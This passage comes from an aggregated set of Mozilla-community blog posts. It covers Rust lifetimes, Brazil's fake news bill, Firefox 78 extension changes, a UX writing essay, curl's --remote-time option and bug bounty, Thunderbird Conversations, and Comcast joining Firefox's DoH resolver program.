  3. Give programmers sharp tools, but put guards on them so they can't accidentally cut their fingers off. This is Rust's approach.

Lifetime annotations are a safety guard on references. Rust's references have no synchronization and no reference counting -- that's what makes them sharp. References in category-1 languages (which typically do have synchronization and reference counting) are "blunted": they're not really quite as effective as category-2 and -3 references, but they don't cut you, and they still work; they might just slow you down a bit.

So, frankly, I like lifetime annotations because they prevent me from cutting my fingers off.

trentj on rust-users

Thanks to Ivan Tham for the suggestions!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

Mozilla Open Policy & Advocacy BlogBrazil’s fake news law will harm users

The “fake news” law being rushed through Brazil’s Senate will massively harm privacy and freedom of expression online. Among other dangerous provisions, this bill would force traceability of forwarded messages, which will require breaking end-to-end encryption. This legislation will substantially harm online security, while entrenching state surveillance.

Brazil currently enjoys some of the most comprehensive digital protections in the world via its Internet Bill of Rights, and the upcoming data protection law is poised to add even more protections. In order to preserve these rights, the ‘fake news’ law should be immediately withdrawn from consideration and be subject to rigorous congressional review with input from all affected parties.

The post Brazil’s fake news law will harm users appeared first on Open Policy & Advocacy.

William Lachancemozregression GUI: now available for Linux

Thanks to @AnAverageHuman, mozregression once again has an easy to use and install GUI version for Linux! This used to work a few years ago, but got broken with some changes in the mozregression-python2 era and didn’t get resolved until now:

This is an area where using telemetry in mozregression can help us measure the impact of a change like this: although Windows still dominates in terms of marketshare, Linux is very widely used by contributors — of the usage of mozregression in the past 2 months, fully 30% of the sessions were on Linux (and it is possible we were undercounting that due to bug 1646402):

link to query (internal-only)

It will be interesting to watch the usage numbers for Linux evolve over the next few months. In particular, I’m curious to see what percentage of users on that platform prefer a GUI.

Appendix: reducing mozregression-GUI’s massive size

One thing that’s bothered me a bunch lately is that the mozregression GUI’s size is massive and this is even more apparent on Linux, where the initial distribution of the GUI came in at over 120 megabytes! Why so big? There were a few reasons:

  1. PySide2 (the GUI library we use) is very large (10s of megabytes), and PyInstaller packages all of it by default into your application distribution.
  2. The binary/Rust portions of the Glean Python SDK had been built with debugging information included (basically a carry-over from when it was a pre-alpha product), which made it 38 megabytes big (!) on Linux.
  3. On Linux at least, a large number of other system libraries are packaged into the distribution.

A few aspects of this were under our control: Ian Moody (:Kwan) and myself crafted a script to manually remove unneeded PySide2 libraries as part of the packaging process. The Glean team was awesome-as-always and quickly rebuilt Glean without debugging information (this was basically an oversight). Finally, I managed to shave off a few more megabytes by reverting the Linux build to an earlier version of Ubuntu (Xenial), which is something I had been meaning to do anyway.

Even after doing all of these things, the end result is still a little underwhelming: the mozregression GUI distribution on Linux is still 79.5 megabytes big. There are probably other things we could do, but we’re definitely entering the land of diminishing returns.

Honestly, my main takeaway is just not to build an application like this in Python unless you absolutely have to (e.g. you’re building an application which needs system-level access). The web is a pretty wonderful medium for creating graphical applications these days, and by using it you sidestep these type of installation issues.

Mozilla Addons BlogExtensions in Firefox 78

In Firefox 78, we’ve made a lot of changes under the hood. These include preparation for changes coming up in Firefox 79, improvements to our tests, and improvements to make our code more resilient. There are three things I’d like to highlight for this release:

  • When using proxy.onRequest, a filter that limits based on tab ID or window ID is now correctly applied. We’ve also greatly improved the performance of these filters. This could be useful for add-ons that want to provide proxy functionality in just one window.
  • Clicking within the context menu from the “all tabs” dropdown now passes the appropriate tab object. In the past, the active tab was erroneously passed.
  • When using downloads.download with the saveAs option set to true, the recently used directory is now remembered on a per-extension basis. For example, a user of a video downloader would benefit from not having to navigate to their videos folder every time the extension offers a file to download (see the sketch below).
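
A minimal sketch of that last item (the URL and filename are hypothetical, and the "downloads" permission is required):

browser.downloads.download({
  url: "https://example.com/videos/talk.webm",
  filename: "talk.webm",
  saveAs: true, // shows the file picker; Firefox 78 remembers the chosen directory per extension
}).then((downloadId) => console.log(`Started download ${downloadId}`));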

These and other changes were brought to you by Atique Ahmed Ziad, Tom Schuster, Mark Smith, as well as various teams at Mozilla. A big thanks to everyone involved in the subtle but important changes to WebExtensions in Firefox.

The post Extensions in Firefox 78 appeared first on Mozilla Add-ons Blog.

Mozilla Open Policy & Advocacy BlogMozilla’s analysis: Brazil’s fake news law harms privacy, security, and free expression

UPDATE: On 30 June 2020, the Brazilian Senate passed “PLS 2630/2020” (the fake news law) with some key amendments that made government identity verification for accounts optional, excluded social media networks from the mandatory traceability provision (while keeping this requirement in place for messaging services like Signal and WhatsApp), and made some other scope-related changes. All the other concerns highlighted below remain a part of the bill passed by the Senate. Additionally, Article 37 of the law mandates that social networks and private messaging apps must appoint legal representatives in Brazil with the power to remotely access user databases/logs. This pseudo data localization measure poses massive privacy concerns while undermining the due process protections provided by US laws such as the CLOUD Act and the Electronic Communications Privacy Act. Both of these laws require US providers to satisfy certain procedural safeguards before turning over private data to foreign law enforcement agents.

The law will now move to the Chamber of Deputies, the lower house of the National Congress in Brazil, for debate and passage. The changes made to the law since the introduction of its most regressive version on June 25 show that while there have been some improvements (in the face of widespread criticism), many dangerous provisions remain. We remain committed to engaging with Brazilian policymakers to resolve the underlying issues while protecting privacy, security, and freedom of expression. The local civil society coalition Coalizão Direitos na Rede has been very influential in the debate so far, should be consulted as the bill moves to the Chamber of Deputies, and is a good source of information about what’s happening.


Original Post from 29 June 2020

While fake news is a real problem, the Brazilian Law of Freedom, Liability, and Transparency on the Internet (colloquially referred to as the “fake news law”) is not a solution. This hastily written legislation — which could be approved by the Senate as soon as today — represents a serious threat to privacy, security, and free expression. The legislation is a major step backwards for a country that has been hailed around the world for its landmark Internet Civil Rights Law (Marco Civil) and its more recent data protection law.

Substantive concerns

While this bill poses many threats to internet health, we are particularly concerned by the following provisions:

Breaking end-to-end encryption: According to the latest informal congressional report, the law would mandate that all communication providers retain records of forwards and other forms of bulk communications, including origination, for a period of three months. As companies are required to report much of this information to the government, in essence, this provision would create a perpetually updating, centralized log of the digital interactions of nearly every user within Brazil. Apart from the privacy and security risks such a vast data retention mandate entails, the law seems infeasible to implement for end-to-end encrypted services such as Signal and WhatsApp. This bill would force companies to leave the country or weaken the technical protections that Brazilians rely on to keep their messages, health records, banking details, and other private information secure.

Mandating real identities for account creation: The bill also broadly attacks anonymity and pseudonymity. If passed, in order to use social media, Brazilian users would have to verify their identity with a phone number (which itself requires government ID in Brazil), and foreigners would have to provide a passport. The bill also requires telecommunication companies to share a list of active users (with their cellphone numbers) with social media companies to prevent fraud. At a time when many are rightly concerned about the surveillance economy, this massive expansion of data collection and identification seems particularly egregious. Just weeks ago, the Brazilian Supreme Court held that mandatory sharing of subscriber data by telecom companies was illegal, making such a provision legally tenuous.

As we have stated before, such a move would be disastrous for the privacy and anonymity of internet users while also harming inclusion. This is because people coming online for the first time (often from households with just one shared phone) would not be able to create an email or social media account without a unique mobile phone number.

This provision would also increase the risk from data breaches and entrench power in the hands of large players in the social media space who can afford to build and maintain such large verification systems. There is no evidence to prove that this measure would help fight misinformation (its motivating factor), and it ignores the benefits that anonymity can bring to the internet, such as whistleblowing and protection from stalkers.

Vague Criminal Provisions: The draft versions of the law circulated over the past week contain additional criminal provisions that make it illegal to:

  • create or share content that poses a serious risk to “social peace or to the economic order” of Brazil, with neither term clearly defined, OR
  • be a member of an online group knowing that its primary activity is sharing defamatory messages.

These provisions, which might be modified in the subsequent drafts based on widespread opposition, would clearly place untenable, subjective restrictions on the free expression rights of Brazilians and have a chilling effect on their ability to engage in discourse online. The draft law also contains other concerning provisions surrounding content moderation, judicial review, and online transparency that pose significant challenges for freedom of expression.

Procedural concerns, history, and next steps

This legislation was nominally first introduced into the Brazilian Congress in April 2020. However, on June 25, a radically different and substantially more dangerous version of the bill was sprung on Senators mere hours ahead of being put to a vote. This led to pushback from Senators, who asked for more time to review the changes, accompanied by widespread international condemnation from civil society groups.

Thanks to concentrated pushback from civil society groups such as the Coalizão Direitos na Rede, some of the most drastic changes in the June 25 draft (such as data localisation and the blocking of non-compliant services) have now been informally dropped by the Rapporteur, who is still pushing for the law to be passed as soon as possible. Despite these improvements, the most worrying proposals remain, and this legislation could pass the Senate as soon as tomorrow, 30 June 2020.

Next steps

We urge Senator Angelo Coronel and the Brazilian Senate to immediately withdraw this bill, and hold a rigorous public consultation on the issues of misinformation and disinformation before proceeding with any legislation. The Commission on Constitution, Justice, and Citizenship in the Senate remains one of the best avenues for such a review to take place, and should seek the input of all affected stakeholders, especially civil society. We remain committed to working with the government to address these important issues, but not at the cost of Brazilians’ privacy, security, and free expression.

The post Mozilla’s analysis: Brazil’s fake news law harms privacy, security, and free expression appeared first on Open Policy & Advocacy.

Firefox UXThe Poetics of Product Copy: What UX Writers Can Learn From Poetry

Two excerpts appear side-by-side to create a comparison. On the left, an excerpt of the poem “This Is Just To Say” by William Carlos Williams: "Forgive me / they were delicious / so sweet/ and so cold." On the right, an excerpt of a Firefox error message that reads, "Sorry. We're having trouble getting your pages back. We are having trouble restoring your last browsing session. Select Restore Session to try again."

Excerpts: “This Is Just To Say” by William Carlos Williams and a Firefox error message

 

Word nerds make their way into user experience (UX) writing from a variety of professional backgrounds. Some of the more common inroads are journalism and copywriting. Another, perhaps less expected path is poetry.

I’m a UX content strategist, but I spent many of my academic years studying and writing poetry. As it turns out, those years weren’t just enjoyable — they were useful preparation for designing product copy.

Poetry and product copy wrestle with similar constraints and considerations. They are each often limited to a small amount of space and thus require an especially thoughtful handling of language that results in a particular kind of grace.

While the high art of poetry and the practical, business-oriented work of UX are certainly not synonymous, there are some key parallels to learn from as a practicing content designer.


1. Both consider the human experience closely

Poets look closely at the human experience. We use the details of the personal to communicate a universal truth. And how that truth is communicated — the context, style, and tone — reflect the culture and moment in time. When a poem makes its mark, it hits a collective nerve.

The poem “Tired” by Langston Hughes floats in a white box: "I am so tired of waiting. Aren’t you, for the world to become good and beautiful and kind? Let us take a knife and cut the world in two — and see what worms are eating at the rind.”

“Tired” by Langston Hughes

 

Like poetry, product copy looks closely at the human experience, and its language reflects the culture from which it was born. As technology has become omnipresent in our lives, the language of the interface has, in turn, become more conversational. “404 Not Found” messages are (ideally) replaced with plain language. Emojis and Hmms are sprinkled throughout the digital experience, riding the tide of memes and tweets that signify an increasingly informal culture. You can read more about the relationship between technology and communication in Erika Hall’s seminal work, Conversational Design.

While the topic at hand is often considerably less exalted than that of poetry, a UX writer similarly considers the details of a moment in time. Good copy is informed by what the user is experiencing and feeling — the frustration of a failed page load or the success of a saved login — and crafts content sensitive to that context.

Product copy strikes the wrong note when it fails to be empathetic to that moment. For example, it’s unhelpful to use technical jargon or make a clever joke when a user encounters a dead end. This insensitivity is made more acute if the person is using the interface to navigate a stressful life event, like filing for leave when a loved one is ill. What they need in that moment is plain language and clear instructions on a path forward.


2. They make sense of complexity with language

Poetry helps us make sense of complexity through language. We turn to poetry to feel our way through dark times — the loss of a loved one or a major illness — and to commemorate happy times — new love, the beauty of the natural world. Poetry finds the words to help us understand an experience and (hopefully) move forward.

Excerpt of the poem, "Toad," by Diane Seuss floats in a white box: "The grief, when I finally contacted it decades later, was black, tarry, hot, like the yarrow-edged side roads we walked barefoot in the summer."

Excerpt: “Toad” by Diane Seuss


 

UX writers also use the building blocks of language to help a user move forward and through an experience. UX writing requires a variety of skills, including the ability to ask good questions, to listen well, to collaborate, and to conduct research. The foundational skill, however, is using language to bring clarity to an experience. Words are the material UX writers use to co-create experiences with designers, researchers, and developers.

Screenshot of the modal which allows a user to identify the issue they are having with an extension. Clipped image displays three possible reasons with examples, including "It claims to be something it's not," "I never wanted it and don’t know how to get rid of it," and "It contains hateful, violent, or illegal content."

Excerpt of a screen for Firefox users to report an issue with a browser extension. The flow enables the user to report an extension, troubleshoot issues, and remove the extension. Co-created with designer Philip Walmsley.


3. Words are selected carefully within a small canvas

“Poetry is your best source of deliberate intentional language that has nothing to do with your actual work. Reading it will descale your mind, like vinegar in a coffee maker.” — Conversational Design, Erika Hall

Poetry considers word choice carefully. And, while poetry takes many forms and lengths, its hallmark is brevity. Unlike a novel, a poem can begin and end on one page, or even in a few words. The poet often uses language to get the reader to pause and reflect.

Product copy should help users complete tasks. Clarity trumps conciseness, but we often find that fewer words — or no words at all — are what the user needs to get things done. While we will include additional language and actions to add friction to an experience when necessary, our goal in UX writing is often to get out of the user’s way. In this way, while poetry has a slowing function, product copy can have a streamlining function.

Working within these constraints requires UX writers to also consider each word very carefully. A button that says “Okay!” can mean something very different, and has a different tone, than a button that says, “Submit.” Seemingly subtle changes in word choice or phrasing can have a big impact, as they do in poetry.

Two screenshots, side-by-side, of a doorhanger in Firefox that promotes the "Pin Tab" feature. Includes header, body copy, illustration of the feature, and primary and secondary buttons. Layout is consistent between the two but there are slight changes in body copy.

Left: Early draft of a recommendation panel for the Firefox Pin Tab feature. Right: final copy, which does not include the descriptors “tab strip” or “tab bar” because users might not be familiar with these terms. A small copy change like using “open in a tab” instead of “tab strip” can have a big impact on user comprehension. Co-created with designer Amy Lee.


4. Moment and movement

Reading a poem can feel like you are walking into the middle of a conversation. And you have — the poet invites you to reflect on a moment in time, a feeling, a place. And yet, even as you pause, poetry has a sense of movement — metaphor and imagery connect and build quickly in a small amount of space. You tumble over one line break on to the next.

Excerpt of the poem, "Bedtime Story," by Franny Choi, floats in a white box. Every other line is heavily indented to give it a sense of movement: "Outside, cicadas threw their jagged whines into the dark. Inside, three children, tucked in our mattresses flat as rice cakes against the floor. Pink quilts, Mickey Mouse cotton – why is it that all my childhood comforts turn out to be imperialism’s drippings?"

Excerpt: “Bedtime Story” by Franny Choi


 

Product copy captures a series of moments in time. But, rather than walking into a conversation, you are initiating it and participating in it. One of the hallmarks of product copy, in contrast to other types of professional writing, is its movement — you aren’t writing for a billboard, but for an interface that is responsive and conditional.

A video clip shows the installation process for an extension, which includes a button to add it to Firefox, then a doorhanger that asks the user to confirm they want to add it, a message confirming it has been added, and then another message notifying the user when the browser takes action (in this case changing a new tab to an image of a cat).

The installation flow for the browser extension, Tabby Cat, demonstrates the changing nature of UX copy. Co-created with designer Emanuela Damiani.


5. Form is considered

Poetry communicates through language, but also through visual presentation. Unlike a novel, where words can run from page to page like water, a poet conducts flow more tightly within the poem’s physical space. Line breaks are chosen with intention. A poem can sit squat, crisp and contained as a haiku, or expand like Allen Ginsberg’s Howl across the page, mirroring the wild discontent of the counterculture movement it captures.

Product copy is also conscious of space, and uses it to communicate a message. We parse and prioritize UX copy into headers and subheadings. We chunk explanatory content into paragraphs and bullet points to make the content more consumable.

Screenshot of the Firefox Notes extension welcome screen. Includes larger welcome text and instructions in bullet points on how to use the app.

The introductory note for the Firefox Notes extension uses type size, bold text, and bullet points to organize the instructions and increase scannability.


6. Meaning can trump grammar

Poetry often plays with the rules of grammar. Words can be untethered from sentences, floating off across the page. Sentences are uncontained with no periods, frequently enjambed.

 Excerpt of "i carry your heart with me(i carry it in" by E. E. Cummings floats in a white box: "i carry your heart with me(i carry it in my heart)i am never without it(anywhere i go you go,my dear;and whatever is done by only me is your doing,my darling)"

Excerpt: “[i carry your heart with me(i carry it in]” by E. E. Cummings

 

In product writing, we also play with grammar. We assign different rules to text elements for purposes of clarity — for example, allowing fragments for form labels and radio buttons. While poetry employs these devices to make meaning, product writing bends or breaks grammar rules so content doesn’t get in the way of meaning — excessive punctuation and title case can slow a reader down, for example.

“While mechanics and sentence structure are important, it’s more important that your writing is clear, helpful, and appropriate for each situation.” — Michael Metts and Andy Welfle, Writing is Designing


Closing thoughts, topped with truffle foam

While people come to this growing profession from different fields, there’s no “right” one that makes you a good UX writer.

As we continue to define and professionalize the practice, it’s useful to reflect on what we can incorporate from our origin fields. In the case of poetry, key points are constraint and consideration. Both poet and product writer often have a small amount of space to move the audience — emotionally, as is the case for poetry, and literally as is the case for product copy.

If we consider a culinary metaphor, a novel would be more like a Thanksgiving meal. You have many hours and dishes to choreograph an experience. Many opportunities to get something wrong or right. A poem and a piece of product copy have just one chance to make an impression and do their work.

In this way, poetry and product copy are more like a single scallop served at a Michelin restaurant — but one that has been marinated in carefully chosen spices, and artfully arranged with a puff of lemon truffle foam and Timut pepper reduction. Each element in this tiny concert of flavors carefully, painstakingly composed.

 

Acknowledgements

Thank you to Michelle Heubusch and Betsy Mikel for your review.

Daniel Stenbergcurl ootw: --remote-time

Previous command line options of the week.

--remote-time is a boolean flag using the -R short option. This option was added to curl 7.9 back in September 2001.

Downloading a file

One of the most basic curl use cases is “downloading a file”. When the URL identifies a specific remote resource and the command line transfers the data of that resource to the local file system:

curl https://example.com/file -O

This command line will then copy every single byte of that file and create a duplicated resource locally – with a time stamp using the current time. Having this time stamp as a default seems natural as it was created just now and it makes it work fine with other options such as --time-cond.

Use the remote file’s time stamp please

There are times when you would rather have the download get the exact same modification date and time as the remote file. We made --remote-time do exactly that.

By adding this command line option, curl will figure out the exact date and time of the remote file and set that same time stamp on the file it creates locally.
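For a quick illustration (a minimal sketch – example.com/file is just a placeholder URL): download with -R and then list the file; the modification time shown should be the remote file’s, not the moment you ran the command.

# Download and keep the remote file's modification time, then inspect it
curl --remote-time -O https://example.com/file
ls -l file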

This option works with several protocols, including FTP, but there are and will be many situations in which curl cannot figure out the remote time – sometimes simply because the server won’t tell – and then curl won’t be able to copy the time stamp and will instead keep the current date and time.

Not by default

This option is not enabled by default because:

  1. curl mimics known tools like cp, which create a new time stamp by default.
  2. For some protocols, getting the remote time requires an extra operation, which can be avoided if the time stamp isn’t actually used for anything.

Combine this with…

As mentioned briefly above, the --remote-time command line option can be really useful to combine with the --time-cond flag. A practical use case is a command line that you can invoke repeatedly, but that only downloads the file if it was updated remotely since the previous time it was downloaded! Like this:

curl --remote-time --remote-name --time-cond cacert.pem https://curl.haxx.se/ca/cacert.pem

This particular example comes from curl’s CA extract web page and downloads the latest Mozilla CA store as a PEM file.

Mark BannerThunderbird Conversations 3.1 Released

Thunderbird Conversations is an add-on for Thunderbird that provides a conversation view for messages. It groups message threads together, including those stored in different folders, and allows easier reading and control for a more efficient workflow.

<figcaption>Conversations’ threaded message layout</figcaption>

Over the last couple of years, Conversations has been largely rewritten to adapt to changes in Thunderbird’s architecture for add-ons. Conversations 3.1 is the result of that effort so far.

<figcaption>Message Controls Menu</figcaption>

The new version will work with Thunderbird 68, and with Thunderbird 78, which will be released soon.

<figcaption>Attachment preview area with gallery view available for images.</figcaption>

The one feature that is currently missing after the rewrite is inline quick reply. This has been of lower priority, as we have focussed on being able to keep the main part of the add-on running with the newer versions of Thunderbird. However, now that 3.1 is stable, I hope to be able to start work on a new version of quick reply soon.

More rewriting will also be continuing for the foreseeable future to further support Thunderbird’s new architecture. I’m planning a more technical blog post about this in future.

If you find an issue, or would like to help contribute to Conversations’ code, please head over to our GitHub repository.

The post Thunderbird Conversations 3.1 Released appeared first on Standard8's Blog.

Cameron KaiserTenFourFox FPR24 available

TenFourFox Feature Parity Release 24 final is now available for testing (downloads, hashes, release notes). There are no additional changes other than outstanding security updates. Assuming all goes well, it will go live on Monday afternoon/evening Pacific time.

I don't have a clear direction for FPR25. As I said, a lot of the low hanging fruit is already picked, and some of the bigger projects are probably too big for a single developer trying to keep up with monthly releases (and do not lend themselves well to progressive implementation). I'll do some pondering in the meantime.

The Mozilla BlogMore details on Comcast as a Trusted Recursive Resolver

Yesterday Mozilla and Comcast announced that Comcast was the latest member of Mozilla’s Trusted Recursive Resolver program, joining current partners Cloudflare and NextDNS. Comcast is the first Internet Service Provider (ISP) to become a TRR and this represents a new phase in our DoH/TRR deployment.

What does this mean?

When Mozilla first started looking at how to deploy DoH we quickly realized that it wasn’t enough to just encrypt the data; we had to ensure that Firefox used a resolver which users could trust. To do this, we created the Trusted Recursive Resolver (TRR) program which allowed us to partner with specific resolvers committed to strong policies for protecting user data. We selected Cloudflare as our first TRR (and the current default) because they shared our commitment to user privacy and security and because we knew that they were able to handle as much traffic as we could send them. This allowed us to provide secure DNS resolution to as many users as possible but also meant changing people’s resolver to Cloudflare. We know that there have been some concerns about this. In particular:

  • It may result in less optimal traffic routing. Some ISP resolvers cooperate with CDNs and other big services to steer traffic to local servers. This is harder (though not impossible) for Cloudflare to do because they have less knowledge of the local network. Our measurements haven’t shown this to be a problem but it’s still a possible concern.
  • If the ISP is providing value added services (e.g., malware blocking or parental controls) via DNS, then these stop working. Firefox tries to avoid enabling DoH in these cases because we don’t want to break services we know people have opted into, but we know those mechanisms are imperfect.

If we were able to verify that the ISP had strong privacy policies then we could use their resolver instead of a public resolver like Cloudflare. Verifying this would of course require that the ISP deploy DoH — which more and more ISPs are doing — and join our TRR program, which is exactly what Comcast has done. Over the next few months we’ll be experimenting with using Comcast’s DoH resolver when we detect that we are on a Comcast network.

How does it work?

Jason Livingood from Comcast and I have published an Internet-Draft describing how resolver selection works, but here’s the short version of what we’re going to be experimenting with. Note: this is all written in the present tense, but we haven’t rolled the experiment out just yet, so this isn’t what’s happening now. It’s also US only, because this is the only place where we have DoH on by default.

First, Comcast inserts a new DNS record on their own recursive resolver for a “special use” domain called doh.test with a value of doh-discovery.xfinity.com. The meaning of this record is just “this network supports DoH and here is the name of the resolver.”

When Firefox joins a network, it uses the ordinary system resolver to look up doh.test. If there’s nothing there, then it just uses the default TRR (currently Cloudflare). However, if there is a record there, Firefox looks it up in an internal list of TRRs. If there is a match to Comcast (or a future ISP TRR) then we use that TRR instead. Otherwise, we fall back to the default.

What’s special about the “doh.test” name is that nobody owns “.test”; it’s specifically reserved for local use, so it’s fine for Comcast to put its own data there. If another ISP wanted to do the same thing, they would populate doh.test with their own resolver name. This means that Firefox can do the same check on every network.
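As a rough sketch of that selection logic – not Firefox’s actual code, and assuming the discovery record can be read with an ordinary DNS lookup tool – the check could look something like this, using a hypothetical one-entry TRR list:

# Hypothetical allow-list of TRR-program resolvers, plus the current default
TRR_LIST="doh-discovery.xfinity.com"
DEFAULT_TRR="https://mozilla.cloudflare-dns.com/dns-query"

# Ask the network's resolver about the special-use name (strip any trailing dot)
candidate=$(dig +short doh.test | head -n 1 | sed 's/\.$//')

if [ -n "$candidate" ] && echo "$TRR_LIST" | grep -qF "$candidate"; then
  echo "Network advertises a known TRR: $candidate"
else
  echo "No known TRR advertised; using the default: $DEFAULT_TRR"
fi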

The end result is that if we’re on a network whose resolver is part of our TRR program then we use that resolver. Otherwise we use the default resolver.

What is the privacy impact?

One natural question to ask is how this impacts user privacy. We need to analyze this in two parts.

First, let’s examine the case of someone who only uses their computer on a Comcast network (if you never use a Comcast network, then this has no impact on you). Right now, we would send your DNS traffic to Cloudflare, but the mechanism above would send it to Comcast instead. As I mentioned above, both Comcast and Cloudflare have committed to strong privacy policies, and so the choice between trusted resolvers is less important than it otherwise might be. Put differently: every resolver in the TRR list is trusted, so choosing between them is not a problem.

With that said, we should also look at the technical situation (see here for more thoughts on technical versus policy controls). In the current setting, using your ISP resolver probably results in somewhat less exposure of your data to third parties because the ISP has a number of other — albeit less convenient — mechanisms for learning about your browsing history, such as the IP addresses you are going to and the TLS Server Name Indication field. However, once TLS Encrypted Client Hello starts being deployed, the Server Name Indication will be less useful and so there will be less difference between the cases.

The situation is somewhat more complicated for someone who uses both a Comcast and non-Comcast network. In that case, both Comcast and Cloudflare will see pieces of their browsing history, which isn’t totally ideal and is something we otherwise try to avoid. Our current view is that the advantages of using a trusted local resolver when available outweigh the disadvantages of using multiple trusted resolvers, but we’re still analyzing the situation and our thinking may change as we get more data.

One thing I want to emphasize here is that if you have a DoH resolver you prefer to use, you can set it yourself in Firefox Network Settings and that will override the automatic selection mechanisms.

Bottom Line

As we said when we started working on DoH/TRR deployment two years ago, you can’t practically negotiate with your resolver, but Firefox can do it for you, so we’re really pleased to have Comcast join us as a TRR partner.

The post More details on Comcast as a Trusted Recursive Resolver appeared first on The Mozilla Blog.

Daniel Stenbergbug-bounty reward amounts in curl

A while ago I tweeted the good news that we’ve handed over our largest single monetary reward yet in the curl bug-bounty program: 700 USD. We announced this security problem in association with the curl 7.71.0 release the other day.

Someone responded to me and wanted this clarified: we award 700 USD to someone for reporting a curl bug that potentially affects users on virtually every computer system out there – while Apple just days earlier awarded a researcher 100,000 USD for an Apple-specific security flaw.

The difference in “amplitude” is notable.

A bug-bounty

I think first we should start with appreciating that we have a bug-bounty program at all! Most open source projects don’t, and we didn’t have any program like this for the first twenty or so years. Our program is just getting started and we’re getting up to speed.

Donations only

How can we in the curl project hand out any money at all? We get donations from companies and individuals. This is the only source of funds we have. We can only give away rewards if we have enough donations in our fund.

When we started the bug-bounty, we had also only rather recently started to get donations (to our Open Collective fund) and we were careful to not promise higher amounts than we would be able to pay, as we couldn’t be sure how many problems people would report and exactly how it would take off.

The more donations the larger the rewards

Over time it has gradually become clear that we’re getting donations at a level and frequency that far surpasses what we’re handing out as bug-bounty rewards. As a direct result of that, we’ve agreed in the curl security team to increase the amounts.

For all security reports we get now that end up in a confirmed security advisory, we will increase the award amounts we hand out – until we reach a level we feel we can be proud of and stand for. I think that level should be more than 1,000 USD even for the lowest graded issues – and maybe ten times that amount for an issue graded “high”. We will, however, never get even within a few orders of magnitude of what the giants can offer.

<figcaption>Accumulated curl bug-bounty payouts to date. A so called hockey stick graph.</figcaption>

Are we improving security-wise?

The graph with the number of reported CVEs per year shows that we started to get a serious number of reports in 2013 (5 reports) and it also seems to show that we’ve passed the peak. I’m not sure we have enough data and evidence to back this up, but I’m convinced we do a lot of things much better in the project now that should help to keep the number of reports down going forward. In a few years when we look back we can see if I was right.

We’re at mid-2020 now with only two reports so far which, if we keep this rate, will make this the best CVE year since 2012. This, while we offer more money than ever for reported issues and have a larger amount of code than ever to find problems in.

<figcaption>Number of CVEs reported for curl distributed over the year of the announcement</figcaption>

The companies surf along

One company suggests that they will chip in and pay for an increased curl bug bounty if the problem affects their use case, but for some reason the problems just never seem to affect them and I’ve pretty much stopped bothering to even ask them.

curl is shipped with a large number of operating systems and in a large number of applications, and yet not even the large-volume users participate in the curl bug bounty program but leave it to us (and they rarely even donate). Perhaps you can report curl security issues to them and have a chance of a higher reward?

You would possibly imagine that these companies should be keen on helping us out to indirectly secure users of their operating systems and applications, but no. We’re an open source project. They can use our products for free and they do, and our products improve their end products. But if there’s a problem in our stuff, that issue is ours to sort out and fix and those companies can then subsequently upgrade to the corrected version…

This is not a complaint, just an observation. I personally appreciate the freedom this gives us.

What can you do to help?

Help us review code. Report bugs. Report all security related problems you can find or suspect exists. Get your company to sponsor us. Write awesome pull requests that improve curl and the way it does things. Use curl and libcurl in your programs and projects. Buy commercial curl support from the best and only provider of commercial curl support.

The Mozilla BlogComcast’s Xfinity Internet Service Joins Firefox’s Trusted Recursive Resolver Program

Committing to Data Retention and Transparency Requirements That Protect Customer Privacy

Today, Mozilla, the maker of Firefox, and Comcast have announced Comcast as the first Internet Service Provider (ISP) to provide Firefox users with private and secure encrypted Domain Name System (DNS) services through Mozilla’s Trusted Recursive Resolver (TRR) Program. Comcast has taken major steps to protect customer privacy as it works to evolve DNS resolution.

“Comcast has moved quickly to adopt DNS encryption technology and we’re excited to have them join the TRR program,” said Eric Rescorla, Firefox CTO. “Bringing ISPs into the TRR program helps us protect user privacy online without disrupting existing user experiences. We hope this sets a precedent for further cooperation between browsers and ISPs.”

For more than 35 years, DNS has served as a key mechanism for accessing sites and services on the internet. Functioning as the internet’s address book, DNS translates website names, like Firefox.com and xfinity.com, into the internet addresses that a computer understands so that the browser can load the correct website.

Over the last few years, Mozilla, Comcast, and other industry stakeholders have been working to develop, standardize, and deploy a technology called DNS over HTTPS (DoH). DoH helps to protect browsing activity from interception, manipulation, and collection in the middle of the network by encrypting the DNS data.

Encrypting DNS data with DoH is the first step. A necessary second step is to require that the companies handling this data have appropriate rules in place – like the ones outlined in Mozilla’s TRR Program. This program aims to standardize requirements in three areas: limiting data collection and retention from the resolver, ensuring transparency for any data retention that does occur, and limiting any potential use of the resolver to block access or modify content. By combining the technology, DoH, with strict operational requirements for those implementing it, participants take an important step toward improving user privacy.

Comcast launched public beta testing of DoH in October 2019. Since then, the company has continued to improve the service and has collaborated with others in the industry via the Internet Engineering Task Force, the Encrypted DNS Deployment Initiative, and other industry organizations around the world. This collaboration also helps to ensure that users’ security and parental control functions that depend on DNS are not disrupted in the upgrade to encryption whenever possible. Also in October, Comcast announced a series of key privacy commitments, including reaffirming its longstanding commitment not to track the websites that customers visit or the apps they use through their broadband connections. Comcast also introduced a new Xfinity Privacy Center to help customers manage and control their privacy settings and learn about its privacy policy in detail.

“We’re proud to be the first ISP to join with Mozilla to support this important evolution of DNS privacy. Engaging with the global technology community gives us better tools to protect our customers, and partnerships like this advance our mission to make our customers’ internet experience more private and secure,” said Jason Livingood, Vice President, Technology Policy and Standards at Comcast Cable.

Comcast is the latest resolver, and the first ISP, to join Firefox’s TRR Program, joining Cloudflare and NextDNS. Mozilla began the rollout of encrypted DNS over HTTPS (DoH) by default for US-based Firefox users in February 2020, but began testing the protocol in 2018.

Adding ISPs in the TRR Program paves the way for providing customers with the security of trusted DNS resolution, while also offering the benefits of a resolver provided by their ISP such as parental control services and better optimized, localized results. Mozilla and Comcast will be jointly running tests to inform how Firefox can assign the best available TRR to each user.

The post Comcast’s Xfinity Internet Service Joins Firefox’s Trusted Recursive Resolver Program appeared first on The Mozilla Blog.

Cameron KaiserThe Super Duper Universal Binary

A question I got repeatedly the last couple days was, now that AARM (Apple ARM) is a thing, is the ultimate ARM-Intel-PowerPC Universal Binary possible? You bet it is! In fact, Apple already documents that you could have a five-way binary, i.e., ARM64, 32-bit PowerPC, 64-bit PowerPC, i386 and x86_64. Just build them separately and lipo them together.

